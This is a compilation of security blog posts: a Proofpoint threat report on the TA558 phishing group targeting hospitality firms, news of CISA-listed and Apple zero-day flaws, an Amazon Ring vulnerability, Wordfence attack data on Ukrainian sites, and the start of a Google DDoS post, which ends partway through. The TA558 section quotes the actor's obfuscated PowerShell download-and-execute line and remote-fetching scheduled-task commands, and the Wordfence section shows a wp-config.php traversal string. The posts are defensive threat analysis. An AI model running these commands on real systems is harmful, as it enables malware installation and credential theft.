Reservations Requested: TA558 Targets Hospitality and Travel 

Key Findings:

  • TA558 is a likely financially motivated small crime threat actor targeting hospitality, hotel, and travel organizations.
  • Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT.
  • TA558’s targeting focus is mainly on Portuguese and Spanish speakers, typically located in the Latin America region, with additional targeting observed in Western Europe and North America.
  • TA558 increased operational tempo in 2022 to a higher average than previously observed. 
  • Like other threat actors in 2022, TA558 pivoted away from using macro-enabled documents in campaigns and adopted new tactics, techniques, and procedures. 

Overview

Since 2018, Proofpoint has tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America, and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads, typically remote access trojans (RATs), that can enable reconnaissance, data theft, and distribution of follow-on payloads.

Proofpoint tracked this actor based on a variety of email artifacts, delivery and installation techniques, command and control (C2) infrastructure, payload domains, and other infrastructure.

In 2022, Proofpoint observed an increase in activity compared to previous years. Additionally, TA558 shifted tactics and began using URLs and container files to distribute malware, likely in response to Microsoft announcing it would begin blocking VBA macros downloaded from the internet by default. 

TA558 has some overlap with activity reported by Palo Alto Networks in 2018, Cisco Talos in 2020 and 2021Uptycs in 2020, and HP in 2022. This report is the first comprehensive, public report on TA558, detailing activity conducted over four years that is still ongoing. The information used in the creation of this report is based on email campaigns, which are manually contextualized, and analyst enriched descriptions of automatically condemned threats.

Campaign Details and Activity Timeline

2018

Proofpoint first observed TA558 in April 2018. These early campaigns typically used malicious Word attachments that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) or remote template URLs to download and install malware. Two of the most common malware payloads included Loda and Revenge RAT. Campaigns were conducted exclusively in Spanish and Portuguese and targeted the hospitality and related industries, with “reserva” (Portuguese word for “reservation”) themes. Example campaign:

Subject: Corrigir data da reserva para o dia 03

Attachment: Booking – Dados da Reserva.docx

Attachment “Author”: C.D.T Original

SHA256: 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910

TA558

Figure 1: Example TA558 email from 2018

The documents leveraged remote template URLs to download an additional RTF document, which then downloaded and installed Revenge RAT. Interestingly, the term “CDT” is in the document metadata and in the URL. This term, which may refer to a travel organization, appears throughout TA558 campaigns from 2018 to present.

RTF payload URL example:

hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc

 

2019

In 2019, this actor continued to leverage emails with Word documents that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) to download and install malware. TA558 also began using macro-laden PowerPoint attachments and template injection with Office documents. This group expanded their malware arsenal to include Loda, vjw0rm, Revenge RAT, and others. In 2019, the group began occasionally expanding targeting outside of the hospitality and tourism verticals to include business services and manufacturing. Example campaign:

Subject: RESERVA

Attachment: RESERVA.docx

Attachment “Author”: msword

Attachment “Last Saved By”: Richard

SHA256: 7dc70d023b2ee5a941edd925999bb6864343b11758c7dc18309416f2947ddb6e

TA558

Figure 2: Example TA558 email from 2019

TA558

Figure 3: Example TA558 Microsoft Word attachment from 2019

The documents leveraged a remote template relationship URL to download an additional RTF document. The RTF document (Author: obidah qudah, Operator: Richard) exploited the CVE-2017-11882 vulnerability to retrieve and execute an MSI file. Upon execution, the MSI file extracted and ran Loda malware.

In December 2019, Proofpoint analysts observed TA558 begin to send English-language lures relating to room bookings in addition to Portuguese and Spanish.

2020

In 2020, TA558 stopped using Equation Editor exploits and began distributing malicious Office documents with macros, typically VBA macros, to download and install malware. This group continued to use a variety of malware payloads including the addition of njRAT and Ozone RAT.  

Hotel, hospitality, and travel organization targeting continued. Although the actor slightly increased its English-language operational tempo throughout 2020, most of the lures featured Portuguese and Spanish reservation requests. An example of a common attack chain in 2020:

From: Oab Brasil <fernando1540@bol[.]com[.]br>

Subject: Orçamento Conferencistas – 515449939

Attachment: reserva.ppa

SHA256: c2b817b02e56624c8ed7944e76a3896556dc2b7482f747f4be88f95e232f9207

TA558

Figure 4: Example TA558 email from 2020

The message contained a PowerPoint attachment that used template injection techniques and VBA macros which, if enabled, executed a PowerShell script to download a VBS payload from an actor-controlled domain. The VBS script in turn downloaded and executed Revenge RAT.

Attack Path

Figure 5: 2020 attack path example

TA558 was more active in 2020 than previous years and 2021, with 74 campaigns identified. 2018, 2019, and 2021 had 9, 70, and 18 total campaigns, respectively. So far in 2022, Proofpoint analysts have observed 51 TA558 campaigns. 

TA558

Figure 6: Total number of TA558 campaigns over time

2021

In 2021, this actor continued to leverage emails with Office documents containing macros or Office exploits (e.g. CVE-2017-8570) to download and install malware. Its most consistently used malware payloads included vjw0rm, njRAT, Revenge RAT, Loda, and AsyncRAT. 

Additionally, this group started to include more elaborate attack chains in 2021. For example, introducing more helper scripts and delivery mechanisms such as embedded Office documents within MSG files.

In this example 2021 campaign, emails purported to be, e.g.:

From: Financeiro UNIMED <financeiro@unimed-corporated[.]com>

Subject: Reserva

Replyto: cdt[name]cdt@gmail[.]com

Attachment: OficioCircularencaminhadoaoSetorFinanceiroUNIMED.docx

SHA256: 2f0f99cbac828092c0ec23e12ecb44cbf53f5a671a80842a2447e6114e4f6979

Emails masqueraded as Unimed, a Brazilian medical work cooperative and health insurance operator. These messages contained Microsoft Word attachments with macros which, if enabled, invoked a series of scripts to ultimately download and execute AsyncRAT. 

TA558

Figure 7: Example TA558 email from 2021

Of note is the repeat use of the string “CDT” contained the replyto email address and C2 domain names.

AsyncRAT C2 domains:

warzonecdt[.]duckdns[.]org

cdt2021.zapto[.]org

Example PowerShell execution to download and execute AsyncRAT:

$NOTHING = ‘(Ne<^^>t.We’.Replace(‘<^^>’,’w-Object

Ne’);$alosh=’bC||||||!@!@nlo’.Replace(‘||||||!@!@’,’lient).Dow’); $Dont=’adString(”hxxps[:]//brasilnativopousada[.]com[.]br/Final.txt”)

‘;$YOUTUBE=IEX ($NOTHING,$alosh,$Dont -Join ”)|IEX

Persistence was achieved through a scheduled task masquerading as a Spotify service.

schtasks /create /sc MINUTE /mo 1 0 /tn "Spotfy" /tr
 "\"%windir%\system32\mshta.exe\"hxxps[:]//www[.]unimed-
corporated[.]com/microsoft.txt" /F

This was the actor’s least active year. Proofpoint observed just 18 campaigns conducted by TA558 in 2021.

2022

In 2022, campaign tempo increased significantly. Campaigns delivered a mixture of malware such as, Loda, Revenge RAT, and AsyncRAT. This actor used a variety of delivery mechanisms including URLs, RAR attachments, ISO attachments, and Office documents.

TA558 followed the trend of many threat actors in 2022 and began using container files such as RAR and ISO attachments instead of macro-enabled Office documents. This is likely due to Microsoft’s announcements in late 2021 and early 2022 about disabling macros by default in Office products, which caused a shift across the threat landscape of actors adopting new filetypes to deliver payloads.

Additionally, TA558 began using URLs more frequently in 2022. TA558 conducted 27 campaigns with URLs in 2022, compared to just five campaigns total from 2018 through 2021. Typically, URLs led to container files such as ISOs or zip files containing executables.

TA558

Figure 8: Campaigns using specific threat types over time

For example, this 2022 Spanish language campaign featured URLs leading to container files. Messages purported to be, e.g.:

From: Mauricio Fortunato <contato@155hotel[.]com[.]br>

Subject: Enc: Reserva Familiar

The URL purported to be a legitimate 155 Hotel reservation link that led to an ISO file and an embedded batch file. The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT.

Similar to earlier campaigns, persistence was achieved via a scheduled task:

schtasks /create /sc MINUTE /mo 1 /tn Turismo /F /tr
"powershell -w h -NoProfile -ExecutionPolicy Bypass -
Command start-sleep -s 20;iwr ""\""hxxps[:]//unimed-
corporated[.]com/tur/turismo[.]jpg""\"" -useB|iex;"
TA558

Figure 9: 2022 campaign example chain.

In April 2022 Proofpoint researchers spotted a divergence from the typical email lure. One of the campaigns included a QuickBooks invoice email lure. Additionally, this campaign included the distribution of RevengeRAT which had not been observed in use by TA558 since December 2020. Messages purported to be:

From: Intuit QuickBooks Team <quickbooks@unimed-corporated.com>

Subject: QuickBooks Invoice 1000172347

Attachment: 1000172347.xlsm

SHA256: b57a9f7321216c3410ebcc9d4b09e73a652dee9e750f96b2f6d7d1e39e2923d6

The emails contained Excel attachments with macros that downloaded helper scripts via PowerShell and MSHTA. The execution of helper scripts ultimately led to the installation of RevengeRAT. Proofpoint has not seen this theme since April, and it is unclear why TA558 temporarily pivoted away from reservations themes. 

Malware Use

Since 2018, TA558 has used at least 15 different malware families, sometimes with overlapping command and control (C2) domains. The most frequently observed payloads include Loda, Vjw0rm, AsyncRAT, and Revenge RAT.  

TA558

Figure 10: Number of TA558 campaigns by malware type over time

Typically, TA558 uses attacker owned and operated infrastructure. However, Proofpoint has observed TA558 leverage compromised hotel websites to host malware payloads, thus adding legitimacy to its malware delivery and C2 traffic.  

Language Use

Since Proofpoint began tracking TA558 through 2022, over 90% of campaigns were conducted in Portuguese or Spanish, with four percent featuring multiple language lure samples in English, Spanish, or Portuguese.

TA558

Figure 11: Campaign totals by language since 2018

Interestingly, the threat actor often switches languages in the same week. Proofpoint researchers have observed this actor send, for example, a campaign in English and the following day another campaign in Portuguese. Individual targeting typically differs based on campaign language.

Notable Campaign Artifacts

In addition to the consistent lure themes, targeting, message content, and malware payloads, Proofpoint researchers observed TA558 using multiple notable patterns in campaign data including the use of certain strings, naming conventions and keywords, domains, etc. For example, the actor appears to repeat the term CDT in email and malware attributes. This may relate to the CDT Travel organization and related travel reservation lure themes. Proofpoint researchers observed TA558 use the CDT term in dozens of campaigns since 2018, in C2 domains, replyto email addresses, payload URLs, scheduled task name, and Microsoft Office document metadata (i.e., Author, Last Saved By), and Microsoft Office macro language.

Throughout many of the 2019 and 2020 campaigns the threat actor used various URLs from the domain sslblindado[.]com to download either helper scripts or malware payloads. Some examples include:

  • microsofft[.]sslblindado[.]com
  • passagensv[.]sslblindado[.]com
  • system11[.]sslblindado[.]com

Like other threat actors, this group sometimes mimics technology service names to appear legitimate. For example, using terms in payload URLs or C2 domain names. Some examples include:

  • microsofft[.]sslblindado[.]com
  • firefoxsystem[.]sytes[.]net
  • googledrives[.]ddns[.]net

Another interesting pattern observed were common strings like “success” and “pitbull”. In several campaigns Proofpoint researchers spotted these strings in C2 domains. Some examples include:

  • successfully[.]hopto[.]org
  • success20[.]hopto[.]org
  • 4success[.]zapto[.]org

From 2019 through 2020, TA558 conducted 10 campaigns used the keyword “Maringa” or “Maaringa” in payload URLs or email senders. Maringa is a city in Brazil. Examples include:

  • maringareservas[.]com[.]br/seila[.]rtf
  • maringa[.]turismo@system11[.]com[.]br

Possible Objectives

Proofpoint has not observed post-compromise activity from TA558. Based on the observed payloads, victimology, and campaign and message volume, Proofpoint assesses with medium to high confidence that this is a financially motivated cybercriminal actor.

The malware used by TA558 can steal data including hotel customer user and credit card data, allow lateral movement, and deliver follow-on payloads.

Open-source reporting provides insight into one possible threat actor objective. In July, CNN Portugal reported a Portuguese hotel’s website was compromised, and the actor was able to modify the website and direct customers to a fake reservation page. The actor stole funds from potential customers by posing as the compromised hotel. Although Proofpoint does not associate the identified activity with TA558, it provides an example of possible follow-on activity and the impacts to both target organizations and their customers if an actor is able to compromise hotel or transportation entities.

Conclusion

TA558 is an active threat actor targeting hospitality, travel, and related industries since 2018. Activity conducted by this actor could lead to data theft of both corporate and customer data, as well as potential financial losses.

Organizations, especially those operating in targeted sectors in Latin America, North America, and Western Europe should be aware of this actor’s tactics, techniques, and procedures.

Indicators of Compromise (IOCs)  

The following IOCs represent a sample of indicators observed by Proofpoint researchers associated with TA558.  

C2 Domains

IndicatorDescriptionDate Observed
quedabesouro[.]ddns[.]netRevengeRAT C2 Domain2018
queda212[.]duckdns[.]orgnjRAT/RevengeRAT C2 Domain2018
3030pp[.]hopto[.]orgvjw0rm C2 Domain2018 and 2019
vemvemserver[.]duckdns[.]orgHoudini/Loda C2 Domain2019
4success[.]zapto[.]orgLoda C2 Domain2019
success20[.]hopto[.]orgLoda C2 Domain2020
msin[.]hopto[.]orgLoda C2 Domain2021 and 2022
cdtpitbull[.]hopto[.]orgAsyncRAT C2 Domain2021 and 2022
111234cdt[.]ddns[.]netnjRAT/AsyncRAT C2 Domain2021 and 2022
cdt2021[.]zapto[.]orgAsyncRAT C2 Domain2021 and 2022
38[.]132[.]101[.]45RevengRAT C2 IP2022

Payload URLs

IndicatorDescriptionDate Observed
hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]docRTF payload URL2018 
hxxp[://]hypemediardf[.]com[.]pl/css/css[.]docLoda Payload URL2019
hxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txtAsyncRAT Payload URL2021
hxxps[:]//www[.]unimed-corporated[.]com/microsoft[.]txtAsyncRAT Scheduled Task URL2021
hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpgAsyncRAT Scheduled Task URL2022

ET Signatures

ETPRO MALWARE Loda Logger CnC Activity

ETPRO TROJAN MSIL/Revenge-RAT Keep-Alive Activity (Outbound)

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M2

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M4

ETPRO TROJAN njRAT/Bladabindi Variant CnC Activity (inf)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (inf)

ET TROJAN Bladabindi/njRAT CnC Command (ll)

Source :
https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

CISA Adds 7 New Actively Exploited Vulnerabilities to Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday moved to add a critical SAP security flaw to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

The issue in question is CVE-2022-22536, which has received the highest possible risk score of 10.0 on the CVSS vulnerability scoring system and was addressed by SAP as part of its Patch Tuesday updates for February 2022.

CyberSecurity

Described as an HTTP request smuggling vulnerability, the shortcoming impacts the following product versions –

  • SAP Web Dispatcher (Versions – 7.49, 7.53, 7.77, 7.81, 7.85, 7.22EXT, 7.86, 7.87)
  • SAP Content Server (Version – 7.53)
  • SAP NetWeaver and ABAP Platform (Versions – KERNEL 7.22, 8.04, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, KRNL64UC 8.04, 7.22, 7.22EXT, 7.49, 7.53, KRNL64NUC 7.22, 7.22EXT, 7.49)

“An unauthenticated attacker can prepend a victim’s request with arbitrary data, allowing for function execution impersonating the victim or poisoning intermediary web caches,” CISA said in an alert.

“A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation,” Onapsis, which discovered the flaw, notes. “Consequently, this makes it easy for attackers to exploit it and more challenging for security technology such as firewalls or IDS/IPS to detect it (as it does not present a malicious payload).”

Aside from the SAP weakness, the agency added new flaws disclosed by Apple (CVE-2022-32893, and CVE-2022-32894) and Google (CVE-2022-2856) this week as well as previously documented Microsoft-related bugs (CVE-2022-21971 and CVE-2022-26923) and a remote code execution vulnerability in Palo Alto Networks PAN-OS (CVE-2017-15944, CVSS score: 9.8) that was disclosed in 2017.

CyberSecurity

CVE-2022-21971 (CVSS score: 7.8) is a remote code execution vulnerability in Windows Runtime that was resolved by Microsoft in February 2022. CVE-2022-26923 (CVSS score: 8.8), fixed in May 2022, relates to a privilege escalation flaw in Active Directory Domain Services.

“An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System,” Microsoft describes in its advisory for CVE-2022-26923.

The CISA notification, as is traditionally the case, is light on technical details of in-the-wild attacks associated with the vulnerabilities so as to avoid threat actors taking further advantage of them.

To mitigate exposure to potential threats, Federal Civilian Executive Branch (FCEB) agencies are mandated to apply the relevant patches by September 8, 2022.

Source :
https://thehackernews.com/2022/08/cisa-adds-7-new-actively-exploited.html

Analyzing Attack Data and Trends Targeting Ukrainian Domains

As we continue to monitor the cyber situation in Ukraine, the data we are seeing shows some interesting trends. Not only has the volume of attacks continued rising throughout the conflict in Ukraine, the types of attacks have been varied. A common tactic of cyber criminals is to run automated exploit attempts, hitting as many possible targets as they can to see what gets a result. The data we have analyzed shows that this tactic is being used against Ukrainian websites. This is in contrast to a targeted approach where threat actors go after specific individuals or organizations, using gathered intelligence to make at least an educated guess at the type of vulnerabilities that may be exploitable.

Data Shows a Variety of Attack Types

In the past 30 days, we have seen 16 attack types that triggered more than 85 different firewall rules across protected websites with .ua top-level domains. These rules blocked more than 9.8 million attack attempts on these websites, with the top five attack types accounting for more than 9.7 million of those attempts.

Top blocked rules against .ua domains

In order to demonstrate the top five attack types, we are going to follow a single threat actor who has been observed attempting each of these attack types throughout the last 30 days. Combining the originating IP addresses associated with the attack attempts with the user-agent that was used and other commonalities, we can say with a high degree of certainty that the demonstrated attack attempts were work of the same threat actor.

Known Malicious IP Addresses

The largest category of blocked attack attempts were due to use of a known malicious IP address. These IP addresses are maintained by the Wordfence blocklist, with new addresses added when they become maliciously engaged, and removed when they are no longer being used maliciously. When we see activity from an IP address on the blocklist, it is immediately blocked, however we do track the request that was received from the attacking server.

Top IPs blocked from attacking .ua domains

The top IP addresses we have blocked using known malicious IP addresses were often seen attempting to upload spam content to websites, however it was also common to see file upload and information disclosure attempts as well. Here we see a simple POST request that uses URL encoding along with base64 encoding to obfuscate a command to be run.

Blocked IP request example 1

The decoded payload will simply display XO_Sp3ctra to alert the malicious actor that the affected system will allow commands to be run by them.

Output from blocked IP example 1

When we look at the top known malicious IP addresses blocked worldwide, the top 15 are IP addresses within Russia. This does not match what we are seeing in the Ukraine, where the top attacking IP addresses vary in location across North America, Europe, and Asia, with only three in Russia. However, there is a similarity. The IP address in 15th position worldwide for most initiated exploit attempts is in 4th position for blocked attacks against .ua domains. The IP address, 152.89.196.102, is part of an ASN belonging to Chang Way Technologies Co. Limited. The IP itself is located in Russia, but assigned to a company named Starcrecium Limited, which is based in Cyprus and has been used to conduct attacks of this type in the past. This IP has been blocked 78,438 times on .ua websites, with a total of 3,803,734 blocked attack attempts worldwide.

When you consider the fact that we logged malicious activity from almost 2.1 million individual IP addresses in this time, and the 15th worldwide ranked IP was ranked 4th against an area as small as Ukraine, the number of blocked attacks becomes very significant. Additionally, there were three IP addresses that ranked higher in Ukraine, but did not even make the top 20 worldwide, showing that while there are threat actors who are not focusing heavily on Ukraine, others are very focused on Ukrainian websites. What we are seeing from the IP addresses targeting Ukrainian websites more heavily is similar to what we see here, with information gathering and uploading spam content being the two main goals of the attack attempts.

One thing to keep in mind here is the fact that all .ua sites get our real-time threat intelligence, which is typically reserved for Wordfence Premium, Care, and Response customers, so it is not possible to get a true comparison between the websites in Ukraine and the rest of the world. IP addresses are added to the blocklist for many reasons, including the attack types we outlined above. Often these addresses are blocked for simple malicious behavior, such as searching for the existence of specific files on a website. More complex behavior like searching for the ability to run commands on the server will also lead to an IP being added to the blocklist.

Known Malicious User-Agents

One way that we block attacks is by tracking known malicious user-agents. This was the second-largest category our firewall blocked on .ua domains. When we see a user-agent string that is consistently being used in malicious events, like the user-agent below, we add it to a firewall rule.

Known malicious user-agent string

User-agent strings can be set to an arbitrary value, so blocking user-agents is not sufficient to maintain security on its own. Nonetheless, tracking and blocking consistently malicious user-agents still allows us to block millions of additional attacks a day and provides us with a great degree of visibility into attacks that are less targeted at specific vulnerabilities. Many threat actors consistently use a given user-agent string, so this also allows us to block a large number of credential stuffing attacks on the first attempt, rather than after a certain threshold of failed logins.

There are many reasons a user-agent will be blocked by the Wordfence firewall, but always for consistent malicious activity. For instance, the user-agent here has been tracked in numerous types of attack attempts without consistent legitimate activity or false positives being detected. It is frequently found looking for configuration files, such as the aws.yml file in this example. Keep in mind that the fact that the actor is searching for this file does not automatically mean it exists on the server. However, if the file does exist and can be read by a would-be attacker, the data contained in the file would tell them a lot about the Amazon Web Services server configuration being used. This could lead to the discovery of vulnerabilities or other details that could help a malicious actor damage a website or server.

Malicious user-agent request example 1

Similarly, information about the server could be discovered no matter who the server provider is if a file that returns configuration information, such as a info.php or server_info.php file can be discovered and accessed. Knowing the web server version, PHP version, and other critical details can add up to a vulnerability discovery that makes it easy for a malicious actor to access a website.

Malicious user-agent request example 2

In addition to searching for configuration files, and other malicious activities, we also see an attacker using this specific user-agent attempting to upload malicious files to the servers they are trying to compromise. The following shows an attacker using the same known malicious user-agent attempting to upload a zip file, which, if successful, unzips to install a file named sp3ctra_XO.php on the server. When we said there were clues that these attack attempts were being perpetrated by the same threat actor, you can see here what one of those clues are with the sp3ctra_XO.php filename variation of the XO_Sp3ctra output seen earlier.

Malicious user-agent request example 3

Over the past 30 days, we have observed this user-agent string used in more than 1.3 million attack attempts against Ukrainian websites. This makes it the largest attacking user-agent that is not immediately recognizable as an unusual user-agent. The only user-agent string that had more tracked attack attempts is wp_is_mobile. These user-agent strings are among the dozens that have been observed over time to be consistently associated only with malicious activity.

The user-agent we are following here was logged in 1,115,824,706 attack attempts worldwide in the same time frame, making this a very common malicious user-agent string. With this being a prolific user-agent in attacks around the world, it is no surprise that it is being seen in regular attack attempts on Ukrainian websites. Whether specifically targeted, or just a victim of circumstance, Ukrainian websites are seeing an increase in attacks. This is likely due to heightened activity from threat actors globally.

Directory Traversal

The next largest category of attack attempts we have been blocking targeting .ua domains was directory traversal. This relies on a malicious actor getting into the site files wherever they can, often through a plugin or theme vulnerability, and trying to access files outside of the original file’s directory structure. We are primarily seeing this used in much the same way as the information disclosure attacks, as a way to access the wp-config.php file that potentially provides database credentials. Other uses for this type of attack can also include the ability to get a list of system users, or access other sensitive data stored on the server.

Directory traversal request example

In this example, the malicious actor attempted to download the site’s wp-config.php file by accessing the file structure through a download.php file in the twentyeleven theme folder, and moving up the directory structure to the WordPress root, where the wp-config.php file is located. This is seen in the request by adding ?file=..%2F..%2F..%2Fwp-config.php. This tells the server to look for a wp-config. php file that is three directories higher than the current directory.

This type of attack is often a guessing game for the malicious actor, as the path they are attempting to traverse may not even exist, but when it does, it can result in stolen data or damage to a website or system. The fact that the twentyeleven theme was used here does not necessarily indicate that the theme was vulnerable, or even installed on the site, only that the malicious actor was attempting to use it as a jumping off point while trying to find a vulnerable download.php file that could be used for directory traversal.

Information Disclosure

Information disclosure attacks are the fourth-largest attack type we blocked against .ua domains. The primary way we have observed threat actors attempting to exploit this type of vulnerability is through GET requests to a website, using common backup filenames, as seen in the example below. Unfortunately, due to the insecure practice of system administrators appending filenames with .bak as a method of making a backup of a file prior to modifying the contents, threat actors are likely to successfully access sensitive files by simply attempting to request critical files in known locations, with the .bak extension added. When successful, the contents of the file will be returned to the threat actor.

This is a fairly straightforward attack type, where the request simply returns the contents of the requested file. If a malicious actor can obtain the contents of a site’s wp-config.php file, even an outdated version of the file, they may be able to obtain the site’s database credentials. With access to a site’s database credentials, an attacker could gain full database access granted they have access to the database to log in with the stolen credentials. This would then give the attacker the ability to add malicious users, change a site’s content, and even collect useful information to be used in future attacks against the site or its users.

Information disclosure request example

File Upload

File upload rounds out the top five categories of attack attempts we have been blocking targeting .ua domains. In these attempts, malicious actors try to get their own files uploaded to the server the website is hosted on. This serves a number of purposes, from defacing a website, to creating backdoors, and even distributing malware.

The example here is only one of the many types of upload attacks we have blocked. A malicious actor can use this POST request to upload a file to a vulnerable website that allows them to upload any file of their choosing. This can ultimately lead to remote code execution and full server compromise.

File upload request example with payload

The POST request in this case includes the contents of a common PHP file uploader named bala.php. This code provides a simple script to select and upload any file the malicious actor chooses. If the upload is successful they will see a message stating eXploiting Done but if it fails they message will read Failed to Upload. The script also returns some general information about the system that is being accessed, including the name of the system and the operating system being used.

Another important thing to note about this request is that it attempts to utilize the Ioptimization plugin as an entry point. Ioptimization is a known malicious plugin that offers backdoor functionality, but was not actually installed in the site in question. This indicates that the threat actor was trying to find and take over sites that had been previously compromised by a different attacker.

BalaSniper upload example

The fact that file uploads are the most common blocked attack type is not at all surprising. File uploads can be used to distribute malware payloads, store spam content to be displayed in other locations, and install shells on the infected system, among a number of other malicious activities. If a malicious actor can upload an executable file to a site, it generally gives them full control of the infected site and a foothold to taking over the server hosting that site. It can also help them remain anonymous by allowing them to send out further attacks from the newly infected site.

Conclusion

In this post, we continued our analysis of the cyber attacks targeting Ukrainian websites. While there has been an increase in the number of attacks being blocked since the start of Russia’s invasion of Ukraine, the attacks do not appear to be focused. Known malicious IP addresses were the most common reason we blocked attacks in the last 30 days, however, information stealing and spam were the most common end goals for the observed attack attempts.

If you believe your site has been compromised as a result of a vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

Source :
https://www.wordfence.com/blog/2022/08/analyzing-attack-data-and-trends-targeting-ukrainian-domains/

Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities

Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.

The list of issues is below –

  • CVE-2022-32893 – An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content
  • CVE-2022-32894 – An out-of-bounds issue in the operating system’s Kernel that could be abused by a malicious application to execute arbitrary code with the highest privileges

Apple said it addressed both the issues with improved bounds checking, adding it’s aware the vulnerabilities “may have been actively exploited.”

The company did not disclose any additional information regarding these attacks or the identities of the threat actors perpetrating them, although it’s likely that they were abused as part of highly-targeted intrusions.

CyberSecurity

The latest update brings the total number of zero-days patched by Apple to six since the start of the year –

  • CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
  • CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
  • CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
  • CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges

Both the vulnerabilities have been fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

Update: Apple on Thursday released a security update for Safari web browser (version 15.6.1) for macOS Big Sur and Catalina to patch the WebKit vulnerability fixed in macOS Monterey.

Source :
https://thehackernews.com/2022/08/apple-releases-security-updates-to.html

New Amazon Ring Vulnerability Could Have Exposed All Your Camera Recordings

Retail giant Amazon patched a high-severity security issue in its Ring app for Android in May that could have enabled a rogue application installed on a user’s device to access sensitive information and camera recordings.

The Ring app for Android has over 10 million downloads and enables users to monitor video feeds from smart home devices such as video doorbells, security cameras, and alarm systems. Amazon acquired the doorbell maker for about $1 billion in 2018.

Application security firm Checkmarx explained it identified a cross-site scripting (XSS) flaw that it said could be weaponized as part of an attack chain to trick victims into installing a malicious app.

CyberSecurity

The app can then be used to get hold of the user’s Authorization Token, that can be subsequently leveraged to extract the session cookie by sending this information alongside the device’s hardware ID, which is also encoded in the token, to the endpoint “ring[.]com/mobile/authorize.”

Armed with this cookie, the attacker can sign in to the victim’s account without having to know their password and access all personal data associated with the account, including full name, email address, phone number, and geolocation information as well as the device recordings.

https://youtube.com/watch?v=eJ5Qsx4Fdks

This is achieved by querying the below two endpoints –

  • account.ring[.]com/account/control-center – Get the user’s personal information and Device ID
  • account.ring[.]com/api/cgw/evm/v2/history/devices/{{DEVICE_ID}} – Access the Ring device data and recordings
CyberSecurity

Checkmarx said it reported the issue to Amazon on May 1, 2022, following which a fix was made available on May 27 in version 3.51.0. There is no evidence that the issue has been exploited in real-world attacks, with Amazon characterizing the exploit as “extremely difficult” and emphasizing that no customer information was exposed.

The development comes more than a month after the company moved to address a severe weakness affecting its Photos app for Android that could have been exploited to steal a user’s access tokens.

Source :
https://thehackernews.com/2022/08/new-amazon-ring-vulnerability-could.html

How Google Cloud blocked the largest Layer 7 DDoS attack at 46 million rps

Over the past few years, Google has observed that distributed denial-of-service (DDoS) attacks are increasing in frequency and growing in size exponentially. Today’s internet-facing workloads are at constant risk of attack with impacts ranging from degraded performance and user experience for legitimate users, to increased operating and hosting costs, to full unavailability of mission critical workloads. Google Cloud customers are able to use Cloud Armor to leverage the global scale and capacity of Google’s network edge to protect their environment from some of the largest DDoS attacks ever seen.

On June 1, a Google Cloud Armor customer was targeted with a series of HTTPS DDoS attacks which peaked at 46 million requests per second. This is the largest Layer 7 DDoS reported to date—at least 76% larger than the previously reported record. To give a sense of the scale of the attack, that is like receiving all the daily requests to Wikipedia (one of the top 10 trafficked websites in the world) in just 10 seconds.

Cloud Armor Adaptive Protection was able to detect and analyze the traffic early in the attack lifecycle. Cloud Armor alerted the customer with a recommended protective rule which was then deployed before the attack ramped up to its full magnitude. Cloud Armor blocked the attack ensuring the customer’s service stayed online and continued serving their end-users.

DDoS Attack Graphic - pretty.jpg
Figure 1: DDoS attack graph peaking at 46M requests per second.

What happened: Attack analysis and timeline

Starting around 9:45 a.m. PT on June 1, 2022, an attack of more than 10,000 requests per second (rps) began targeting our customer’s HTTP/S Load Balancer. Eight minutes later, the attack grew to 100,000 requests per second. Cloud Armor Adaptive Protection detected the attack and generated an alert containing the attack signature by assessing the traffic across several dozen features and attributes. The alert included a recommended rule to block on the malicious signature. The following is the alert showing details of the attack before it ramped to its peaks.

CAAP alert - largest ddos.jpg
Figure 2: Cloud Armor Adaptive Protection alert listing the top region codes detected as a part of the attack.

